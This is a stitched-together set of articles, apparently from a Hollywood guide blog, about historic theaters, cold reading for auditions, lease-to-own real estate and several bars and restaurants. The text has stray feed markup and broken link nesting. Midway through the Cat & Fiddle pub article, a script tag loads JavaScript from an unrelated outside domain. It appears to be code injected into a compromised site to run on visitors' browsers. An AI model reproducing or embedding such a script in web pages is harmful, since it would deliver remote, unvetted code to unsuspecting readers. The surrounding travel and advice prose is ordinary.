Web: <a href="http://www.americancinematheque.com/egyptian/egypt.htm" target="_blank">http://www.americancinematheque.com/egyptian/egypt.htm</a><br />
Phone: 323-466-3456<br />
Parking: Several adjacent lots, validation only at Hollywood &amp; Highland complex</p>
<p>Another one of the historic Hollywood theaters, Grauman&#8217;s Egyptian Theatre was opened originally in 1922. It actually was the host of the first-ever Hollywood premiere party, and in 1993 was declared a historical and cultural landmark. After decades of prosperity, the theatre had been out of operation but then was renovated for over $15 million in 1998, and is known as the American Cinematheque Egyptian Theatre, with the main 600+ seat screen known as the Lloyd E. Rigler.</p>
<p>The Egyptian <a href="http://www.abouthollywood.com/hollywood-nightlife/">Hollywood theatre</a> features its standout architecture, with massive stone columns, Egyptian statues and ancient style lettering, and since its renovation, has reasserted its status as one of the best Hollywood theaters to visit. Today, it features mostly classic movies from decades past, and showcases other special events as well.</p>
<h2>Cin[e]space</h2>
<p>6356 Hollywood Boulevard<br />
Hollywood, CA 90028<br />
Web: <a href="http://www.cinespace.info" target="_blank">http://www.cinespace.info</a><br />
Phone: 323-817-3456<br />
Parking: Street and valet parking available</p>
<p>Cin[e]space is an innovative location and venue serving as both cinema, lounge, night club and restaurant. This makes it a very unique place and an all-encompassing experience wrapped into one. It combines several different destinations into one, making it a perfect place for events, nights out on the town, parties, special screenings and performances, and more.</p>
<h2>Hudson Theatres</h2>
<p>6539 Santa Monica Blvd<br />
Los Angeles, CA 90038<br />
Web:<a href="http://www.hudsontheatre.com" target="_blank">http://www.hudsontheatre.com </a><br />
Phone: 323-856-4249<br />
Parking: Valet parking and street parking available</p>
<p>While movie theaters these days seem to think that bigger is better, the Hudson Hollywood theatre remains compact and cozy, featuring three different screens, none of which hold more than 100 seats. The lobby features an espresso bar and art gallery, adding to the exclusive, upscale but also intimate, unique and friendly vibes that the Hudson offers.</p>
<p>Opened in 1991, this is certainly one of the standout Hollywood theaters. Available on the different stages is a mix of local productions and plays, to larger Broadway style musicals touring the country and much more. To see great theatre in an intimate environment there&#8217;s nothing quite like the Hudson Hollywood theatre.</p>
<h2>The Complex</h2>
<p>6476 Santa Monica Blvd.<br />
Hollywood, CA 90038<br />
Web: <a href="http://www.complexhollywood.com/" target="_blank">http://www.complexhollywood.com/</a><br />
Phone: 323-465-0383<br />
Parking: Street parking and valet parking after 7 pm</p>
<p>The Complex, billed as &#8220;Hollywood&#8217;s Theatre district under one roof&#8221; is a unique grouping of multiple theaters and studios all wrapped into one. There are five different Hollywood theaters located in The Complex, including the Ruby Theatre, Dorie Theatre, Flight Theatre, Theatre 6470, and the East Theatre.</p>
<p>All of the theaters are intimate, with between 42 and 55 seats, and all of them feature their own unique elements. There are also five studios within the complex, for theatre classes, rehearsals, auditions and more. Both local plays and screenings of unique movies and other special events and showings are available.</p>
<p>That should just about wrap up your tour of the <a href="http://www.abouthollywood.com">best Hollywood theaters.</a> From the classics and historical landmarks, to perfect spots for the latest big films or Broadway plays and everything in between, there&#8217;s always a great Hollywood theatre for you to spend an afternoon or evening at. Cross all of the Hollywood theaters off one at a time by checking them all out, or find your favorite spot that offers you everything you&#8217;re looking for.</p>

<content:encoded><![CDATA[<p><img src="http://www.abouthollywood.com/wp-content/uploads/2011/01/cold-reading-200x300.jpg" alt="Female actress at a casting call studying her script." title="Female Actor at Casting Call" width="200" height="300" class="alignleft size-medium wp-image-1747" />If you are auditioning for television, movies or commercials you know that you are going to be required to read from a script during your audition that you most likely have never seen before. This is typical and expected, unlike in theater where in many cases you prepare a monologue, which you&#8217;ve had plenty of time to memorize. If you don&#8217;t already feel comfortable with cold reaching, then it will be essential for you to get comfortable as this can and will be very important for your career. It will be in your best interest to master this art. </p>
<h2>Cold Reading definition</h2>
<p>Cold Reading is defined as receiving a script which you have never seen or read before and auditioning with that script for a scene or role. As you may get lucky and receive a script in advance, where you may have a short time or over 24 hours to prepare for the audition, this isn&#8217;t of the norm today, and you&#8217;ll find yourself receiving a script while arriving at your audition. Cold Reading is so critical that if you&#8217;re looking to be a successful <a href="http://www.abouthollywood.com/hollywood-actors/">Hollywood Actor</a>, you&#8217;ll need to work on this.</p>
<p>If you&#8217;ve never done cold reading before, it&#8217;s not difficult to learn. All you&#8217;ll need to do is get random scripts which you&#8217;ve never seen before, read and memorize the first line, and say it without peaking at the script. That, right there, is your first cold reading. If while reading this you&#8217;ve never done this before, be prepared to do an internet search to find scripts or get your hands on scripts to try this out. When you first attempt to cold read, you&#8217;ll most likely only be able to memorize a couple words right away, though over time you&#8217;ll start to master the art and have the ability to memorize multiple lines at once. Compare yourself to an athlete. When an athlete is working on a new play or workout it&#8217;s always usually a challenge, though over time and after a great deal of repetition, they are able to do what they&#8217;ve worked on with much more ease. As you work on this type of acting training, over time you&#8217;ll get better and better. Don&#8217;t get lazy and make it a point to practice cold reading! If you live with someone else, have them practice with you which will make this much more fun. </p>
<h2><i>&#8220;It&#8217;s just as important to hear what the other actor is saying&#8230;&#8221;</i></h2>
<p>It may seem like a good idea to try and look at your next line at an audition while the other actor is going thru their lines. This wouldn&#8217;t necessarily be wise. It&#8217;s just as important to hear what the other actor is saying as it is for you to perform your lines. When it&#8217;s your time to say your lines, then look and respond to it. </p>
<p>Again, as you work on this craft more and more you&#8217;ll be able to memorize more lines. When it&#8217;s your turn, memorize however much you can in a couple seconds, and make the proper eye contact with the other actor/actors and share your lines with them.</p>
<p><strong>Repeat this process over and over</strong> if there&#8217;s plenty to memorize, which is going to take more time then a quick glance. Try and keep your eyes off the script after looking at the lines. You don&#8217;t want to read the lines looking at the script as this will most likely lead to you not getting the part and blowing the audition. And also, you&#8217;ll want to be in character at all times while performing your lines during this audition, unless you are told to do something different.</p>
<p>Once you receive the script <strong>try and read the whole script right away</strong> on lines you&#8217;d be performing and try to memorize it. If it&#8217;s too long to memorize, at least try and memorize the first few lines, but by reading thru the script you&#8217;ll have a clearer idea about the different characters, how you&#8217;ll need to talk in character and you&#8217;ll also have a greater grasp on the scene. The stronger you are at the beginning and end will most likely make the person who&#8217;s auditioning you remember you! </p>
<p>Make sure not to bury yourself in the script, and <em>if you&#8217;re a righty, hold the script in your left hand &#8211; chest level.</em> Act as if it&#8217;s a part of your body and don&#8217;t wave it around. Less is better on drawing attention to the script. You want the person who is auditioning you to be paying attention to you and not what you&#8217;re holding. </p>
<p>If it feels very awkward where cold reading is slower, don&#8217;t stress about it. Casting directors know that you didn&#8217;t have the script before and in many cases they&#8217;re seeing your ability to be in character based on the personality you take on from what is in the script. Slow isn&#8217;t bad, so don&#8217;t panic&#8230; It&#8217;s pretty normal.</p>
<h2>What do successful Hollywood Actors do daily?</h2>
<p>Training regularly in cold reading is a must if you want to succeed as an actor. If you don&#8217;t work on it, you&#8217;ll struggle to get thru auditions. You may be an amazing actor, but if you don&#8217;t have cold reading down, you may really have a tough time getting your next part. In Hollywood there are so many successful top actors and actresses auditioning daily which you are competing with. Make it a point to cold read regularly as part of your training and you&#8217;ll find that you stand a greater chance in landing more roles as an outcome. </p>

<content:encoded><![CDATA[<p><img src="http://www.abouthollywood.com/wp-content/uploads/2011/01/lease-to-own-150x150.jpg" alt="Lease to own Property" title="lease to own property" width="150" height="150" class="alignleft size-thumbnail wp-image-1741" />Many people <a href="http://www.abouthollywood.com">move to Hollywood</a>, Los Angeles and/or cities all over the world because they have a dream. Everyone has a dream! For many, owning <a href="<a href="http://www.abouthollywood.com/hollywood-real-estate/">Real Estate</a> is a big dream and one which can feel so distant. If credit problems have haunted you thru the years, you know that this can lead into many other problems. Some of those problems can include trying to purchase a car, getting certain jobs (in which credit is critical), opening up a bank account, getting a cell phone which isn&#8217;t pre-paid, and of-course, purchasing or renting a home, condo, or apartment. Bad credit makes it very difficult to get approved for a loan. Hope may seem and feel like it&#8217;s a lost cause when visioning the American dream of one day owning your own <a href="http://www.abouthollywood.com/hollywood-real-estate/">real estate</a> if you are experiencing credit problems. </p>
<p>When you have problems with credit, it typically takes a great deal of time to recover. The positive side of looking towards that American dream is that there&#8217;s many <a href="http://www.abouthollywood.com/hollywood-real-estate/reasons-to-consider-starting-a-real-estate-investing-business/">investors</a> out there which are willing to take risks on individuals with credit issues, though they&#8217;ll need to see you&#8217;re making positive attempts and taking positive action in getting your credit problems back in order. The negative side of this is that the process typically isn&#8217;t cheap to most consumers. The process is very time consuming for most and can have hiccups along the way. In the current economy we know that life isn&#8217;t as easy for many as it once was, especially when looking at the number of foreclosures out there. Those who are caught in the daily bubble of living with horrible credit look at owning a home as hopeless unless something changes.</p>
<h2>Lease to Own Scenario</h2>
<p>One way in possibly being able to turn a negative into a positive while repairing your credit is looking for properties which the owners are willing to do a contract which is a lease to own scenario. The person who owns the property is taking a big risk as they are counting on you in paying towards that mortgage (while they are most likely making a little profit and you are also paying additional which would be applied towards your down payment), though you may also be a savior based on current market conditions, where they are just having issues trying to sell the property. They are most likely able to justify charging a little more as they are taking a risk on you to repair your credit, which some can be used towards the purchase of the property. If you breach your lease, they are at risk. If an eviction is necessary based on a breach in your lease, depending on your security deposit, they may be out large sums of money on repairs. </p>
<p>What you also have to keep in mind is the investor doesn&#8217;t know what the future may hold for you based on your financial situation. You may rent the property for years to all of a sudden decide when your credit is repaired that you&#8217;ve decided not to purchase this property, in which the property is returned to the investor and depending on future market conditions this can be a good or bad thing (it&#8217;s a risk). If this is the case, you know the owner would only hope that they made some profit thru the years. <a href="http://www.abouthollywood.com/hollywood-real-estate/">Hollywood Real Estate</a> has really been a roller coaster ride over the past few years, and owners will have these thoughts in mind when considering a lease to purchase offer. </p>
<p>If that isn&#8217;t the case for you, there&#8217;s several ways that leasing to own a property can work for you. The most typical way is where the agreement has a specific term, which may be between 2 to 5 years, in which part of your monthly rent is applied towards your down payment for the property once you&#8217;re able to receive traditional financing. If over the course of those years you have 20% down, you have a greater chance in your <a href="http://www.abouthollywood.com/hollywood-real-estate/why-pre-qualify-a-few-good-reasons-why-you-should-get-pre-qualified-for-a-loan-before-you-start-your-search/">loan being approved.</a> If as a renter you make a strong effort towards credit repair on raising your credit scores, and combine the amount being put down, you&#8217;ll be in a much better place then you were in years past. </p>
<p>Another thing to keep in mind is that you are able to make it clear to the current homeowner that as far as maintenance goes towards the purchase, much of those repairs would fall on you as you&#8217;ve been in the property when looking at a sale for several years and you&#8217;re goal is to own the property in time. The little more you&#8217;re willing to spend each month becomes money applied towards the down payment and if you decide to leave or cannot repair your credit, that&#8217;s money in the owners pocket (which you wouldn&#8217;t want). </p>
<h2>Lease to Own Hollywood Real Estate</h2>
<p>So if you are currently hoping to one day own <a href="http://www.abouthollywood.com/hollywood-real-estate/">Hollywood Real Estate,</a> whether its in one of the Hollywood Hills <a href="http://www.abouthollywood.com/hollywood-neighborhoods/">neighborhoods</a>, or in the flats, make sure you put some thought into a Lease to own scenario. This may not be easy but it may be your best chance and it gives you a big goal to achieve. </p>
<p>Before taking this step, it would be wise for you to consult with an attorney, financial advisor and a <a href="http://www.eleganthomesinla.com">Hollywood Realtor®</a> or Real Estate Agent who can go over both rental market comps and property comps. Good luck!</p>

<h2>Musso and Frank&#8217;s Grill &#8211; Hollywood</h2>
<p>Some things never change, and Musso and Frank Grill just might be one of them. The business opened in 1919 and it has been in the same location in Hollywood since 1934. You&#8217;d be hard pressed to find much that&#8217;s been altered. The same family has owned it for many, many years.</p>
<p>The renowned back room where iconic L.A. literary figures used to dine is no longer open, but when you walk in today it is easy to picture legendary imbibers Raymond Chandler, Nathanael West, William Faulkner, or Dorothy Parker hanging out here. There are places all over town claiming that poet and author Charles Bukowski drank there. Charles Bukowski actually did drink here.</p>
<p>More than one patron has referred to The Musso and Frank Grill as a time machine because the look of the place has not changed appreciable over the years. It&#8217;s been used as a location for scenes in many <a href="http://www.abouthollywood.com/movies/">movies</a> and television programs over the years. You may have seen it in a recent episode of TV&#8217;s Mad Men.</p>
<h2>Ruben Rueda</h2>
<p>However, It&#8217;s not just the décor that&#8217;s retro here. This is a bar and grill, with professional bartenders who&#8217;ve worked here for years. Ruben Rueda started working here as a bus boy in 1967, was soon promoted to bartender, and has been there ever since. Ruben along with his fellow bartenders Manny and Mario serve up classic drinks as well as their own particular specialties. </p>
<p>Unlike so many places in <a href="http://www.abouthollywood.com/hollywood-neighborhoods/">Hollywood</a> where your server is just biding time while trying to sell a screenplay, the wait staff here are service professionals who take pride in their work and in the food they serve. They are known for remembering what regulars order. Enjoying a meal here is an experience in &#8220;this is how it&#8217;s done.&#8221;</p>
<p>There is counter seating for lunch or dinner, unusual in a place of this upscale type, as well as a regular bar and old-style deep red leather booths. </p>
<h2>Menu Items at Musso &#038; Frank Grill</h2>
<p>The menu at the Musso &#038; Frank Grill reflects the tastes of its Hollywood glamour days. In what is possibly the only concession to the modern world, there are menu items offered for vegetarians. Mainly you&#8217;ll find American and continental classics like steaks, chops, and lobster, as well as obscure favorites like Welsh rarebit, herring in sour cream, Crab Louie, sardine sandwiches, and jellied consommé. You can&#8217;t eat burgers all the time. The funnel cakes are legendary and are not to be missed.</p>
<p>Musso and Frank Grill is a favorite spot to take visitors from out of town. You can spend a lot here for an extended meal or a modest amount if you just want to enjoy a cocktail while drinking in the vintage atmosphere. Validated parking is available around the back.</p>

<content:encoded><![CDATA[<p>The Cat &#038; Fiddle, located at 6435 Sunset Boulevard, has a definite place in <a href="http://www.abouthollywood.com/hollywood-neighborhoods/hollywood-california-history-and-information/">Hollywood history</a> dating from long before it became a pub. Built in 1929, the building has been a commissary, a wardrobe house, and a filming location at different times over the years. </p>
<p>The family who owns it has long-standing ties to the rock and roll world. Many people on staff are also working artists and touring performers.</p>
<p>The patio is a popular feature of this English-themed bar. There is a fountain and a canopy of lighted trees so there is a feeling of privacy and leafy enclosure. It&#8217;s heated by fire pits in the cooler months and pleasantly shaded in the summer.</p>
<p>Some say it&#8217;s what&#8217;s on tap that makes a real pub. At Cat &#038; Fiddle you can enjoy draft Harp, Guinness, Bass Ale, or Strongbow cider. Available in bottles are Chimay Red Ale, Fuller&#8217;s ESB, pear cider, Heineken, and good old American Budweiser. Wine drinkers can choose from a suitable selection of reds, whites, and champagnes.</p>
<p><center><SCRIPT type="text/javascript" LANGUAGE="javascript" src="http://www.qksz.net/1e-jkog"> </SCRIPT></p>
<p></center></p>
<p>Happy hour features special $3.50 prices on well drinks, house wine, and draft beers. The happy hour $5 appetizer menu has a good selection, featuring things like Scotch egg (a hard-cooked egg, breaded, deep fried, and wrapped in sausage), chicken skewers, and onion rings.</p>
<p>Those who are not familiar with pub <a href="http://www.abouthollywood.com/dining/">food</a>, or those who love it, can taste some fine examples here. Such traditional favorites as fish and chips, steak and kidney pie, bangers and mash, which is a homemade sausage with mashed potato, are available. Breakfast is served anytime. If you just want a bit of something to nibble on while you enjoy your pint, try the Ploughman&#8217;s lunch, a cheese plate consisting of English Stilton, Gloucester, fruit, and chutney.</p>
<p>As you might expect to find in a place with an English pub theme, there are darts tournaments and English football fans. Darts tournaments are held once a month. Soccer fans gather here to watch the games on the 92 inch projection screen or one of several other monitors. They offer ESPN, Fox Soccer channel, English Premier League and EUFA games, as well as NFL and NBA games.</p>
<p>The Cat &#038; Fiddle has a very active nighttime scene. If you enjoy a lively crowd and a &#8220;this joint is jumping&#8221; vibe you will like coming here in the evening. Sunday nights feature live music performances of various kinds and Thursday nights there is a DJ spinning from 9:30 to 12:30.</p>
<p>To enjoy a more subdued experience, stop in during the afternoon. It&#8217;s a good spot to meet friends for conversation and a soup or salad lunch. It is also a popular Sunday brunch destination.</p>
<p>Customers can avoid the hassle of Hollywood street parking by taking advantage of the Cat &#038; Fiddle&#8217;s valet parking.</p>

This little place next door to the Pantages Theater is a Hollywood Boulevard institution. It&#8217;s located just by <a href="http://www.abouthollywood.com">Hollywood</a> and Vine and has been there since that intersection was the symbol of old Hollywood glamour.</p>
<p>There is a lot of like about the Frolic Room. It&#8217;s a small place with the bar down one long narrow wall. On the opposite wall is a mural featuring caricatures of various famous faces as rendered by the great Al Hirschfeld. Did Einstein, Freud, Groucho and Satchmo actually drink here? Who knows? It&#8217;s just fun to have them adorning the walls of this watering hole. The retro décor of mirrors, vintage lighting fixtures, and assorted memorabilia captures a unique sense of timelessness. Never mind the trendy; here&#8217;s the Frolic Room.</p>
<p>The Frolic Room is a dive bar in the best sense of the word. It has a completely unpretentious atmosphere, very reasonable prices, drinks definitely on the strong side, welcoming bartenders, friendly regulars, and fresh popcorn. What&#8217;s not to like? They even brew a fine cup of Joe, if you find yourself here during the afternoon.</p>
<p>Frolic Room patrons are a very diverse crowd. You&#8217;ll see a mix of ages and types, locals and tourists, regulars and bar hoppers. It&#8217;s possible to meet people from anywhere in the world here. It&#8217;s a great place to grab a quick drink before a show at the Pantages, <a href="http://www.abouthollywood.com/hollywood-nightlife/online-guide-to-top-live-hollywood-music-venues-clubs-theatres/">Music Box</a>, or Ricardo Montalban theaters.</p>

<p>Selections on the juke box reflect the variety you&#8217;ll find in the patrons. You can enjoy standards, funk, R&#038; B, jazz and all eras of rock. The jukebox is one of the things that keeps people coming back.</p>
<p>This is the kind of old-school bar where you might see someone sitting at the bar reading. There&#8217;s always good conversation to be had at the Frolic Room, but if you want to just sit and enjoy a beer, you&#8217;ll be comfortable doing it here. This is also an excellent place to watch sports if you want some company while you catch the game, but are not the sports bar type.</p>
<p>There is no cover charge and definitely no velvet rope here. Because it is such a small place, the bar can get crowded on weekend nights depending on what&#8217;s going on at the Pantages. When you are planning a Hollywood Boulevard pub crawl you should definitely make The Frolic Room one of your stops. If you happen to be in the area some night, stop in and find out why this place remains popular with so many people, year after year.</p>
